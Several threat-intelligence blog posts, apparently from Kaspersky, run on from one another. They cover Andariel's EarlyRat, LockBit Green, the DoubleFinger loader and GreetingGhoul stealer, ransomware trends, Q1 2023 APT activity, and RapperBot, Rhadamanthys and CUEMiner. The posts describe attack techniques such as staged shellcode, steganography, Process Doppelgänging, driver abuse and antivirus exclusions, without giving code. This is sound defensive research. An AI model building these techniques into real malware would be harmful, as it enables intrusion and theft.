Introduction

Andariel, a part of the notorious Lazarus group, is known for its use of the DTrack malware and Maui ransomware in mid-2022. During the same period, Andariel also actively exploited the Log4j vulnerability as reported by Talos and Ahnlab. Their campaign introduced several new malware families, such as YamaBot and MagicRat, but also updated versions of NukeSped and, of course, DTrack.

While on an unrelated investigation recently, we stumbled upon this campaign and decided to dig a little bit deeper. We discovered a previously undocumented malware family and an addition to Andariel’s set of TTPs.

From initial infection to fat fingers

Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the C2 server. Unfortunately, we were unable to catch the first piece of malware they downloaded, but we did see that exploitation was closely followed by the DTrack backdoor being downloaded.

From this point on, things got rather interesting, as we were able to reproduce the commands the attackers executed. It quickly became clear that the commands were run by a human operator, and judging by the amount of mistakes and typos, likely an inexperienced one. For example:

Note how “Program” is misspelled as “Prorgam” . Another funny moment was when the operators realized they were in a system that used the Portuguese locale. This took surprisingly long: they only learned after executing cmd.еxe /c net localgroup as you can see below:

We were also able to identify the set of off-the-shelf tools Andariel that installed and ran during the command execution phase, and then used for further exploitation of the target. Below are some examples:

• Supremo remote desktop;
• 3Proxy;
• Powerline;
• Putty;
• Dumpert;
• NTDSDumpEx;
• ForkDump;
• And more which can be found in our private report.

Meet EarlyRat

We first noticed a version of EarlyRat in one of the aforementioned Log4j cases and assumed it was downloaded via Log4j. However, when we started hunting for more samples, we found phishing documents that ultimately dropped EarlyRat. The phishing document itself is not that advanced as can be seen below:

Once macros are enabled, the following command is executed:

Oddly enough, the VBA code pings a server associated with the HolyGhost / Maui ransomware campaign.

EarlyRat, just like many other RATs (remote access Trojans), collects system information upon starting and sends it to the C2 using the following template:

As can be seen above, there are two different parameters in the request: “id” and “query”. Next to those, the “rep0” and “page” parameters are also supported. They are used in the following cases:

• id: unique ID of the machine used as a cryptographic key to decrypt value from “query”
• query: the actual content. It is Base64 encoded and rolling XORed with the key specified in the “id” field.
• rep0: the value of the current directory
• page: the value of the internal state

In terms of functionality, EarlyRat is very simple. It is capable of executing commands, and that is about the most interesting thing it can do. There is a number of high-level similarities between EarlyRat and MagicRat. Both are written using a framework: QT is used for MagicRat and PureBasic, for EarlyRat. Also, the functionality of both RATs is very limited.

Conclusion

Despite being an APT group, Lazarus is known for performing typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated. Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware.

Focusing on TTPs as we did with Andariel helps to minimize attribution time and detect attacks in their early stages. This information can also help in taking proactive countermeasures to prevent incidents from happening.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals, or if you have questions about our private reports, reach out to us at crimewareintel@kaspersky.com.

Introduction

In recent months, we published private reports on a broad range of subjects. We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these. If you have questions or need more information about our crimeware reporting service, contact crimewareintel@kaspersky.com.

Phishing and a kit

Recently we stumbled upon a Business Email Compromise (BEC) case, active since at least Q3 2022. The attackers target German-speaking companies in the DACH region. As in many other BEC cases, they register a domain name that is similar to that used by the attacked organization and typically differs in one or two letters. For reasons unknown, the Reply-to field contains a different email address from the From field. The Reply-to email address does not mimic the target-organization’s domain.

In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.

At the end of this past January, we observed a spike in phishing email from a campaign targeting business users, which we have closely monitored. We noticed that the message contained a link to an “email confirmation form”. If one clicked on the link, they found themselves on a page looking very similar to that of the recipient’s domain. The phishing kit was designed to serve multiple campaigns at a time while running one instance on the web server. This was easily demonstrated by modifying the page URL, specifically the reference to the targeted user in it^ the layout of the phishing page would change.

An example of a SwitchSymb-generated phishing page

LockBit Green

LockBit is one of the most prolific ransomware groups currently active, targeting businesses all over the world. Over time, they have adopted code from other ransomware gangs, such as BlackMatter and DarkSide, making it easier for potential affiliates to operate the ransomware.

Starting in this past February, we have detected a new variant, named “LockBit Green”, which borrows code from the now-defunct Conti gang. According to the Kaspersky Threat Attribution Engine (KTAE), LockBit incorporates 25% of Conti code.

KTAE shows similarities between LockBit Green and Conti

Three pieces of adopted code really stand out: the ransomware note, the command line options and the encryption scheme. Adopting the ransom note makes the least sense. We could not think of a good reason for doing so, but nevertheless, LockBit did it. In terms of command line options, the group added those from Conti to make them available in Lockbit. All the command line options available in Lockbit Green are:

Finally, LockBit adopted the encryption scheme from Conti. The group now usesa custom ChaCha8 implementation to encrypt files with a randomly generated key and nonce that are saved/encrypted with a hard-coded public RSA key.

Binary diffing across the two families

Multi-platform LockBit

We recently stumbled on a ZIP file, uploaded to a multiscanner, that contained LockBit samples for multiple architectures, such as Apple M1, ARM v6, ARM v7, FreeBSD and many others. The next question would obviously be, “What about codebase similarity?”.

For this, we used the KTAE: simply throwing in the downloaded ZIP file was enough to see that all the samples were derived from the LockBit Linux/ESXi version, which we wrote about in an earlier private report.

Source code shared with LockBit Linux

Further analysis of the samples led us to believe that LockBit were in the process of testing their ransomware on various architectures, instead of deploying it in the wild. For instance, the macOS sample was unsigned, so it could not be executed as is. Also, the string encryption method was simple: one byte XOR.

Nevertheless, our findings suggest that LockBit will target more platforms in the wild in the (near) future.

Conclusion

The world of cybercrime is huge, consisting of many players and gangs that are fluid in terms of composition. Groups adopt other groups’ code, and affiliates — which can be considered cybercrime groups in their own right — switch between different types of malware. Groups work on upgrades to their malware, adding features and providing support for multiple, previously unsupported, platforms, a trend that existed for some time now.

When an incident occurs, it is important to find out who has targeted you. This helps to limit the scope of incident response and could help to prevent further damage. The KTAE attributes code to cybercrime groups and highlights features shared by different malware families. This information can also help in taking proactive countermeasures to prevent incidents from happening in the future.

Finally, criminals often resort to old tricks, such as phishing, which, nevertheless, remain highly effective. Being aware of the latest trends can prevent threats like BEC from materializing.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals or have questions about our private reports, contact crimewareintel@kaspersky.com.

Introduction

Stealing cryptocurrencies is nothing new. For example, the Mt. Gox exchange was robbed of many bitcoins back in the beginning of 2010s. Attackers such as those behind the Coinvault ransomware were after your Bitcoin wallets, too. Since then, stealing cryptocurrencies has continued to occupy cybercriminals.

One of the latest additions to this phenomenon is the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.

DoubleFinger stage 1

The first stage is a modified “espexe.exe” (MS Windows Economical Service Provider Application) binary, where the DialogFunc is patched so that a malicious shellcode is executed. After resolving API functions by hash, which were added to DialogFunc, the shellcode downloads a PNG image from Imgur.com. Next, the shellcode searches for the magic bytes (0xea79a5c6) in the downloaded image, locating the encrypted payload within the image.

Real DialogFunc function (left) and patched function with shellcode (right)

The encrypted payload consists of:

1. A PNG with the fourth-stage payload;
2. An encrypted data blob;
3. A legitimate java.exe binary, used for DLL sideloading;
4. The DoubleFinger stage 2 loader.

DoubleFinger stage 2

The second-stage shellcode is loaded by executing the legitimate Java binary located in the same directory as the stage 2 loader shellcode (the file is named msvcr100.dll). Just as the first stage, this file is a legitimate patched binary, having similar structure and functionality as the first stage.

To no one’s surprise, the shellcode loads, decrypts and executes the third stage shellcode.

DoubleFinger stage 3

The third-stage shellcode differs greatly from the first and second stages. For example, it uses low-level Windows API calls, and ntdll.dll is loaded and mapped in the process memory to bypass hooks set by security solutions.

Next step is to decrypt and execute the fourth-stage payload, located in the aforementioned PNG file. Unlike the downloaded PNG file, which does not display a valid image, this PNG file does. The steganography method used is, however, rather simple, as the data is retrieved from specific offsets.

The aa.png file with embedded Stage 4

DoubleFinger stage 4

The stage 4 shellcode is rather simple. It locates the fifth stage within itself and then uses the Process Doppelgänging technique to execute it.

DoubleFinger stage 5

The fifth stage creates a scheduled task that executes the GreetingGhoul stealer every day at a specific time. It then downloads another PNG file (which is actually the encrypted GreetingGhoul binary prepended with a valid PNG header), decrypts it and then executes it.

GreetingGhoul & Remcos

GreetingGhoul is a stealer designed to steal cryptocurrency-related credentials. It essentially consists of two major components that work together:

1. A component that uses MS WebView2 to create overlays on cryptocurrency wallet interfaces;
2. A component that detects cryptocurrency wallet apps and steals sensitive information (e.g. recovery phrases).

Examples of fake windows

With hardware wallets, a user should never fill their recovery seed on the computer. A hardware wallets vendor will never ask for that.

Next to GreetingGhoul we also found several DoubleFinger samples that downloaded the Remcos RAT. Remcos is a well-known commercial RAT often used by cybercriminals. We’ve seen it being utilized in targeted attacks against businesses and organizations.

Victims & Attribution

We found several pieces of Russian text in the malware. The first part of the C2 URL is “Privetsvoyu” which is a misspelled transliteration of the Russian word for “Greetings.” Secondly, we found the string “salamvsembratyamyazadehayustutlokeretodlyagadovveubilinashusferu.” Despite the weird transliteration, it roughly translates to: “Greetings to all brothers, I’m suffocating here, locker is for bastards, you’ve messed up our area of interest.”

Looking at the victims, we see them in Europe, the USA and Latin America. This is in accordance with the old adage that cybercriminals from CIS countries don’t attack Russian citizens. Although the pieces of Russian text and the victimology are not enough to conclude that the ones behind this campaign are indeed from the post-Soviet space.

Conclusion

Our analysis of the DoubleFinger loader and GreetingGhoul malware reveals a high level of sophistication and skill in crimeware development, akin to advanced persistent threats (APTs). The multi-staged, shellcode-style loader with steganographic capabilities, the use of Windows COM interfaces for stealthy execution, and the implementation of Process Doppelgänging for injection into remote processes all point to well-crafted and complex crimeware. The use of Microsoft WebView2 runtime to create counterfeit interfaces of cryptocurrency wallets further underscores the advanced techniques employed by the malware.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals, or have questions about our private reports, please contact crimewareintel@kaspersky.com.

Indicators of compromise

DoubleFinger
a500d9518bfe0b0d1c7f77343cac68d8
dbd0cf87c085150eb0e4a40539390a9a
56acd988653c0e7c4a5f1302e6c3b1c0
16203abd150a709c0629a366393994ea
d9130cb36f23edf90848ffd73bd4e0e0

GreetingGhoul
642f192372a4bd4fb3bfa5bae4f8644c
a9a5f529bf530d0425e6f04cbe508f1e

C2
cryptohedgefund[.]us

Ransomware keeps making headlines. In a quest for profits, attackers target all types of organizations, from healthcare and educational institutions to service providers and industrial enterprises, affecting almost every aspect of our lives. In 2022, Kaspersky solutions detected over 74.2M attempted ransomware attacks which was 20% more than in 2021 (61.7M). Although early 2023 saw a slight decline in the number of ransomware attacks, they were more sophisticated and better targeted.

On the eve of the global Anti-Ransomware Day, Kaspersky looks back on the events that shaped the ransomware landscape in 2022, reviews the trends that were predicted last year, discusses emerging trends, and makes a forecast for the immediate future.

Looking back on last year’s report

Last year, we discussed three trends in detail:

• Threat actors trying to develop cross-platform ransomware to be as adaptive as possible
• The ransomware ecosystem evolving and becoming even more “industrialized”
• Ransomware gangs taking sides in the geopolitical conflict

These trends have persisted. A few months after last year’s blog post came out, we stumbled across a new multi-platform ransomware family, which targeted both Linux and Windows. We named it RedAlert/N13V. The ransomware, which focused on non-Windows platforms, supported the halting of VMs in an ESXi environment, clearly indicating what the attackers were after.

Another ransomware family, LockBit, has apparently gone even further. Security researchers discovered an archive that contained test builds of the malware for a number of less common platforms, including macOS and FreeBSD, as well as for various non-standard processor architectures, such as MIPS and SPARC.

As for the second trend, we saw that BlackCat adjusted their TTPs midway through the year. They registered domains under names that looked like those of breached organizations, setting up Have I Been Pwned-like websites. Employees of the victim organizations could use these sites to check if their names had popped up in stolen data, thus increasing the pressure on the affected organization to pay the ransom.

Although the third trend we spotted last year was one of ransomware gangs taking sides in the geopolitical conflict, it does not apply to them exclusively. There was one peculiar sample: a stealer called Eternity. We created a private report about this after an article claimed that the malware was used in the geopolitical conflict. Our research showed that there was a whole malware ecosystem around Eternity, including a ransomware variant. After the article appeared, the author made sure that the malware did not affect users in Ukraine and included a pro-Ukrainian message inside the malware.

The developer warns against using their malware in Ukraine

Pro-Ukrainian message inside the malware code

What else shaped the ransomware landscape in 2022

Ransomware groups come and go, and it is little wonder that some of them ceased operations last year as others emerged.

For example, we reported on the emergence of RedAlert/N13V, Luna, Sugar, Monster, and others. However, the most active family that saw light in 2022 was BlackBasta. When we published our initial report on BlackBasta in April 2022, we were only aware of one victim, but the number has since sharply increased. Meanwhile, the malware itself evolved, adding an LDAP-based self-spreading mechanism. Later, we encountered a version of BlackBasta that targeted ESXi environments, and the most recent version that we found supported the x64 architecture.

As mentioned above, while all those new groups entered the game, some others, such as REvil and Conti, went dark. Conti was the most notorious of these and enjoyed the most attention since their archives were leaked online and analyzed by many security researchers.

Finally, other groups like Clop ramped up their activities over the course of last year, reaching their peak in early 2023 as they claimed to have hacked 130 organizations using a single zero-day vulnerability.

Interestingly, the top five most impactful and prolific ransomware groups (according to the number of victims listed on their data leak sites) have drastically changed over the last year. The now-defunct REvil and Conti, which were second and third, respectively, in terms of attacks in H1 2022, gave way to Vice Society and BlackCat in Q1 2023. The remaining ransomware groups that formed the top five in Q1 2023, were Clop and Royal.

Top five ransomware groups by the number of published victims

Ransomware from an incident response perspective

Global Emergency Response Team (GERT) worked on many ransomware incidents last year. In fact, this was the number-one challenge they faced, although the share of ransomware in 2022 decreased slightly from 2021, going from 51.9% to 39.8%.

In terms of initial access, nearly half of the cases GERT investigated (42.9%) involved exploitation of vulnerabilities in public-facing devices and apps, such as unpatched routers, vulnerable versions of the Log4j logging utility, and so on. The second-largest category of cases consisted of compromised accounts and malicious emails.

The most popular tools employed by ransomware groups remain unchanged from year to year. Attackers have used PowerShell to collect data, Mimikatz to escalate privileges, PsExec to execute commands remotely, or frameworks like Cobalt Strike for all attack stages.

Our predictions for 2023 trends

As we looked back on the events of 2022 and early 2023, and analyzed the various ransomware families, we tried to figure out what the next big thing in this field might be. These observations produced three potential trends that we believe will shape the threat landscape for the rest of 2023.

Trend 1: More embedded functionality

We saw several ransomware groups extend the functionality of their malware during 2022. Self-spreading, real or fake, was the most noteworthy new addition. As mentioned above, BlackBasta started spreading itself by using the LDAP library to get a list of available machines on the network.

LockBit added a so-called “self-spreading” feature in 2022, saving its operators the effort needed to run tools like PsExec manually. At least, that is what “self-spreading” would normally suggest. In practice, this turned out to be nothing more than a credential-dumping feature, removed in later versions.

The Play ransomware, for one, does have a self-spreading mechanism. It collects different IPs that have SMB enabled, establishes a connection to these, mounts the SMB resources, then copies itself and runs on the target machines.

Self-propagation has been adopted by many notorious ransomware groups lately, which suggests that the trend will continue.

Trend 2: Driver abuse

Abusing a vulnerable driver for malicious purposes may be an old trick in the book, but it still works well, especially on antivirus (AV) drivers. The Avast Anti Rootkit kernel driver contained certain vulnerabilities that were previously exploited by AvosLocker. In May 2022, SentinelLabs described in detail two new vulnerabilities (CVE-2022-26522 and CVE-2022-26523) in the driver. These were later exploited by the AvosLocker and Cuba ransomware families.

AV drivers are not the only ones to be abused by malicious actors. Our colleagues at TrendMicro reported on a ransomware actor abusing the Genshin Impact anti-cheat driver by using it to kill endpoint protection on the target machine.

The trend of driver abuse continues to evolve. The latest case reported by Kaspersky is rather odd as it does not fit either of the previous two categories. Legitimate code-signing certificates, such as Nvidia’s leaked certificate and Kuwait Telecommunication Company’s certificate were used to sign a malicious driver which was then used in wiper attacks against Albanian organizations. The wiper used the rawdisk driver to get direct access to the hard drive.

We continue to follow ransomware gangs to see what new ways of abusing drivers they come up with, and we will be sharing our findings both publicly and on our TIP page.

Trend 3: Code adoption from other families to attract even more affiliates

Major ransomware gangs are borrowing capabilities from either leaked code or code purchased from other cybercriminals, which may improve the functionality of their own malware.

We recently saw the LockBit group adopt at least 25% of the leaked Conti code and issue a new version based entirely on that. Initiatives like these enable affiliates to work with familiar code, while the malware operators get an opportunity to boost their offensive capabilities.

Collaboration among ransomware gangs has also resulted in more advanced attacks. Groups are working together to develop cutting-edge strategies for circumventing security measures and improving their attacks.

The trend has given rise to ransomware businesses that build high-quality hack tools and sell them to other ransomware businesses on the black market.

Conclusion

Ransomware has been around for many years, evolving into a cybercriminal industry of sorts. Threat actors have experimented with new attack tactics and procedures, and their most effective approaches live on, while failed experiments have been forgotten. Ransomware can now be considered a mature industry, and we expect no groundbreaking discoveries or game-changers any time soon.

Ransomware groups will continue maximizing the attack surface by supporting more platforms. While attacks on ESXi and Linux servers are now commonplace, top ransomware groups are striving to target more platforms that might contain mission-critical data. A good illustration of this trend is the recent discovery of an archive with test builds of LockBit ransomware for macOS, FreeBSD, and unconventional CPU architectures, such as MIPS, SPARC, and so on.

In addition to that, TTPs that attackers use in their operations will continue to evolve — the driver abuse technique, which we discussed above, is a good example of this. To effectively counter ransomware actors’ ever-changing tactics, we recommend that organizations and security specialists:

• Update their software in a timely manner to prevent infection through vulnerability exploitation, one of the initial infection vectors most frequently used by ransomware actors.
• Use security solutions that are tailored protecting their infrastructure from various threats, including anti-ransomware tools, targeted attack protection, EDR, and so on.
• Keep their SOC or information security teams’ knowledge about ransomware tactics and techniques up to date by using the Threat Intelligence service, a comprehensive source of crucial information about new tricks that cybercriminals come up with.

For more than five years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research; and they provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2023.

Readers who would like to learn more about our intelligence reports or request more information on a specific report, are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

While investigating possible Turla activities, we discovered that the TunnusSched backdoor (aka QUIETCANARY) was being delivered from a Tomiris implant. Having tracked Tomiris since 2021, we believe, with medium-to-high confidence, that it is distinct from Turla. So, we think that either Tomiris is conducting false-flag attacks implicating Turla, or (more likely) that Turla and Tomiris co-operate.

Russian-speaking activity

During our investigation into Tomiris’s activities in 2022, we identified the use of a previously undocumented implant developed in Rust, dubbed “JLORAT”, which was in operation as early as August 2022 and remained active into 2023.

Chinese-speaking activity

We discovered a new in-memory implant, called TargetPlug, that has been used to target game developers in South Korea since at least October 2022. Further analysis revealed that the malware is signed with valid certificates and appears to have a connection to the threat actor Winnti, a connection established through several overlaps such as shared infrastructure, code signing and victimology. We reported the misuse of the stolen “Zepetto Co.” certificate via the appropriate channel.

Middle East

We have identified ongoing spear-phishing campaigns targeting Middle Eastern countries dating back to July 2021. We assess that MuddyWater, a threat actor believed to originate from the same region, is operating these campaigns. Based on our analysis, MuddyWater was able to infect several victims in the Middle East and North Africa. The group went after high-profile entities operating in the government, aviation, energy, telecoms and banking sectors. Our investigation led us to identify the targets of interest to the attackers in this campaign. In fact, a number of spear-phishing emails seem to have been crafted and sent to employees of companies in Saudi Arabia, Turkey, the UAE, Egypt, Jordan, Bahrain, Canada, Kuwait, Israel, Syria, Azerbaijan, Armenia and Malaysia.

In late December last year, we spotted malware that relies on Microsoft Exchange for command-and-control (C2) communication and data exfiltration. Further analysis of the samples revealed it to be a variant of Oilrig’s Lookout malware, which we had reported earlier in 2020 and which targeted a ministry of foreign affairs entity in the Middle East and its branches worldwide. The new variant is also .NET-based, with several modifications in its execution flow compared to the original version; but still utilizing Exchange Web Services (EWS) via the victim’s mailbox for operations. Interestingly, one of the tools used during the intrusion is capable of informing the threat actor of password changes for the target organization’s users. This technique allows for stealthy, persistent access using valid credentials. The threat actor utilized embedded Proton Mail and Gmail addresses for data exfiltration. By analyzing the Proton Mail GPG signatures, we were able to determine that these email addresses were created on November 30, 2022, indicating that this is a recent campaign. While the initial method of entry remains uncertain, our analysis of the malware and tools used suggest that the threat actor likely continues to operate using credentials obtained from previous intrusions, which we found in one of the tools used in this campaign.

We spotted another intrusion-set and malware samples affecting an IT company in the Middle East since early August 2022. We found evidence to suggest, with medium confidence, that the IT company intrusion is linked to OilRig and its recent attack. The threat actor employed a typical Word document containing malicious macros, utilizing a job recruitment theme, to deliver PowerShell-based malware implants that collect sensitive information, including user and server credentials. Putting this into context, the threat actor could abuse the collected credentials to exploit the supply-chain relationship and compromise the IT company’s clients.

In January, we identified new malware written in the .NET language for remote console command execution that was used in a campaign dating back to December 2022. Further investigation led us to uncover what appears to be a new malicious actor, which we dubbed Trila, targeting Lebanese government entities. This actor’s toolset primarily consists of simple, homebrewed malware that enables them to remotely execute Windows system commands on infected machines. The information gathered is then exfiltrated to a legitimate interact.sh project instance that serves as a C2. In addition to the .NET malware, we also discovered Go and Rust variants of a simple, custom SOCKS proxy tool used to redirect C2 communications within the victims’ environment.

LoneZerda is an APT threat actor that is believed to have originated from Libya, with evidence of activity dating back to 2017. The actor was first publicly disclosed by Checkpoint in July 2019 and is known to use politically themed Facebook pages to trick victims into downloading and executing malware. Our findings indicate that the group was targeting diplomatic entities in countries beyond the initially reported scope (i.e., Libya), but still primarily within the Middle East. We identified indicators that the keylogging module used by the actor was still active on the computers of high-profile victims at the time we wrote our private report, although the attacker’s infrastructure had been sinkholed in March 2020. Our report sheds light on various intrusion aspects not covered by publicly available research to help organizations in the same industry verticals or in the same region to protect, detect and hunt for this activity.

Southeast Asia and Korean Peninsula

We published our analysis of observed activity over the past year and a half related to the Origami Elephant threat actor. The group has been found to use two distinct attack chains; one for deploying the known Agent K11 framework and the other for deploying the RTY framework (a successor of YTY AES). Most of the initial stages rely on macro scripts, which retain traditional script structure but also introduce new tricks. Additionally, two new simple downloaders, MinHus and Stage, were identified. These payloads are new versions of the Simple Uploader. The group has also been observed starting to use more complex algorithms to obfuscate strings, instead of simple XOR or addition and subtraction, in an effort to evade detection and attribution.

We recently investigated ScarCruft’s new malware strains and C2 server data. ScarCruft focuses on spying on individuals related to the North Korean government (including what appears to be North Korean workers abroad) and uses tools such as Chinotto for its operations. Our research uncovered a new malware strain developed in the Go language using a legitimate cloud messaging service (ably.com) as a C2 mechanism for the first time. Our monitoring of this ably.com channel shed unprecedented light on ScarCruft activities. The attackers tried to spread additional scripts for persistence and new payloads using their malware. Compromised web servers were used to host these payloads; and we detected suspicious command files on the C2 servers. We captured these commands and identified a new final payload, SidLevel, with extensive capabilities to steal sensitive information from victims. We also got access to data stolen from ScarCruft’s victims. The group continues to target individuals related to North Korea, including novelists, academic students, and also business people who appear to send funds back to North Korea.

We observed a Lazarus campaign, active until January 2023, leveraging a backdoored UltraVNC client to deliver an updated BLINDINCAN payload. The payload has new features, including plug-in-based expanding capabilities. Backdooring prominent open-source programs is one of the means that the Lazarus group has been using to deliver its malware. When executed, the compromised application functions normally but covertly collects victim information and transmits it to the C2 servers. Our telemetry shows evidence of a memory-resident payload being retrieved by the backdoored client. The delivered payload was identified as BLINDINCAN, which we have seen being delivered as second-stage malware before. This updated version of BLINDINCAN shares similar characteristics with previous iterations, such as C2 communication, encryption methods and infection procedure. However, it introduced new features, including plug-in-based expanding capabilities. Analyzing and cracking the Trojanized application’s communications, we discovered information about possible victims in the manufacturing and real-estate sectors in India as targets. Additional analysis of the C2 servers, compromised since early 2020, suggests additional targeting of telecoms companies in Pakistan and Bulgaria. We believe that this campaign is not limited to these countries and sectors.

DTrack is a backdoor that has been used by Andariel (aka StonedFly and Silent Chollima), a subset of Lazarus, for almost a decade in a wide variety of attacks, including deploying ransomware as well as espionage malware. In our previous publication about DTrack, we discussed how the backdoor evolved from its previous versions to the current version in use, as well as the new victimology. In our latest private report, we revisited a campaign from 2022 and expanded on the commands the attackers used to deploy DTrack and the accompanying post-exploitation tools and malware (e.g., 3proxy and Yamabot) deployed thereafter. We identified that the attackers probably exploited servers running vulnerable versions of Log4j to gain an initial foothold, as others have reported. Furthermore, investigating the attacker’s infrastructure helped connect additional Yamabot infections with this incident. We identified several target profiles for related Yamabot deployments, all operating in the scientific research field (biomedical, genetics and soil sciences, and energy).

Other interesting discoveries

In March, we discovered a new malware strain actively targeting a government entity in Pakistan. We designated this malware “DreamLand”. The malware is modular and utilizes the Lua scripting language in conjunction with its Just-in-Time (JIT) compiler to execute malicious code that is difficult to detect. It also features various anti-debugging capabilities and employs Windows APIs through Lua FFI, which utilizes C language bindings to carry out its activities. This is the first time we have seen Lua used by an APT threat actor since its use by AnimalFarm and Project Sauron.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q1 2023:

• Established threat actors such as Turla, MuddyWater, Winnti, Lazarus and ScarCruft continue to develop their toolsets.
• There have also been campaigns from newly discovered threat actors such as Trila.
• We continue to see threat actors using a variety of different programming languages, including Go, Rust and Lua.
• APT campaigns continue to be very geographically dispersed. This quarter, we have seen actors focus their attacks on Europe, the US, the Middle East and various parts of Asia.
• The targets chosen by APT threat actors are equally diverse. They include government and diplomatic bodies, aviation, energy, manufacturing, real estate, finance, telecoms, scientific research, IT and gaming sectors.
• Geo-politics remains a key driver of APT development and cyber-espionage continues to be a prime goal of APT campaigns.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or “other-speaking” languages, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

Introduction

Although ransomware is still a hot topic on which we will keep on publishing, we also investigate and publish about other threats. Recently we explored the topic of infection methods, including malvertising and malicious downloads. In this blog post, we provide excerpts from the recent reports that focus on uncommon infection methods and describe the associated malware.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

RapperBot: “intelligent brute forcing”

RapperBot, based on Mirai (but with a different C2 command protocol), is a worm infecting IoT devices with the ultimate goal to launch DDoS attacks against non-HTTP targets. We observed the first sample in June 2022, when it was targeting SSH and not Telnet services. The latest version, however, removed the SSH functionality part and now focuses exclusively on Telnet—and with quite some success. In Q4 2022, we noticed 112k RapperBot infection attempts coming from over 2k unique IP addresses.

What sets RapperBot apart from other worms is its “intelligent” way of brute forcing: it checks the prompt and, based on the prompt, it selects the appropriate credentials. This method speeds up the brute forcing process significantly because it doesn’t have to go over a huge list of credentials.

RapperBot then determines the processor architecture and infects the device. The downloading of the actual malware is done via a variety of possible commands (for example, wget, curl, tftp and ftpget). If for some reason these methods don’t work, then a malware downloader is uploaded to the device via the shell “echo” commands.

Rhadamanthys: malvertising on websites and in search engines

Rhadamanthys is a new information stealer first presented on a Russian-speaking cyber criminal forum in September 2022 and offered as a MaaS platform. According to the author, the malware:

• Is written in C/C++, while the C2 is written in Golang.
• Is able to do a “stealthy” infection.
• Is able to steal/gather information on CPU type, screen resolution, supported wallets, and so on.
• Evades EDR/AV.
• Has encrypted communication with the C2.

Despite the malware being advertised already in September 2022, we started to detect the first samples at the beginning of 2023. Although Rhadamanthys was using phishing and spam initially as the infection vector, the most recent method is malvertising.

Online advertising platforms offer advertisers the possibility to bid in order to display brief ads in search engines, such as Google, but also websites, mobile apps and more. Both search engine and website-based ad platforms are leveraged by Rhadamanthys. The trick they pull is to display ads representing legitimate applications but in fact containing links to phishing websites. These phishing websites contain fake installers, luring users into downloading and installing the malware.

While analyzing Rhadamanthys, we noticed a strong connection with Hidden Bee miner. Both samples use images to hide the payload inside and both have similar shellcodes for bootstrapping. Additionally, both use “in-memory virtual file systems” and utilize Lua to load plugins and modules.

Comparison between Rhandamanthys’s “prepare.bin” and Hidden Bee’s “preload” modules

CUEMiner: distribution through BitTorrent and OneDrive

In August 2021, a project was started on GitHub called SilentCryptoMiner, hosting the miner consisting of a downloader and the payload, bot source and the compiled builder, as well as additional software, such as a system watcher. It has been constantly updated, with the latest update going back to October 31 2022. The repository is popular with cybercriminals, as illustrated by the huge number of samples we detected that featured many small changes and were combined with the different URLs and TTPs, making it clear that the malware is used by multiple groups in various ways concurrently.

During our investigation, we noticed two methods of spreading the malware. The first is via trojanized cracked software downloaded via BitTorrent. The other method is via trojanized cracked software that is downloaded from OneDrive sharing networks. How victims are lured into downloading these cracked packages is speculation, because we couldn’t find any direct links. Nevertheless, many crack sites these days do not immediately provide downloads. Instead, they point to Discord server channels for further discussion. This suggests some form of human interaction and social engineering.

The downloader is written in .NET and called CUEMiner. Despite being written in .NET, it is wrapped by a C++ based dropper and it connects to a set of URLs, which is varying from sample to sample, to download the miner and configuration settings. It also performs several checks in order to ensure it is running on bare metal systems, and not on a virtual machine. In case all checks are passed, the malware:

• Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
• Fetches configuration details from a hardcoded URL and saves it at different places (for example, c:\logs.uce, %localappdata%\logs.uce).
• Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look benign.
• Downloads the miner and watcher.
• Does a number of other things. The full list you can find in our private report.

The watcher, as the name suggests, monitors the system. If it doesn’t detect any processes that consume lots of system power (for example, games), the miner software is launched. When a heavy process, such as a game, is started, the miner is stopped and only started again when the aforementioned process stops. This is done in order to stay undetected on the system longer.

Conclusion

Open source malware is often used by less skilled cybercriminals. They often lack the required skills and contacts to conduct massive campaigns. Nevertheless, they can be still quite active and effective, as is shown by the huge number of CUEMiner samples we detected. If along their cybercriminal career they gain more skills, such as programming and understanding security better, they often reuse and improve crucial source code parts from open source malware.

Code reuse and rebranding is also used quite often by cybercriminals. There are many ransomware variants that change names over time while mostly containing the same code base. In other cases, cybercriminals re-use parts of the code in new campaigns. For example, Rhadamantys stealer features some code overlaps with the Hidden Bee malware. This suggests involvement of at least one individual in the Rhadamantys campaign who had also been involved in the development of Hidden Bee.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals or have questions about our private reports, please contact crimewareintel@kaspersky.com.

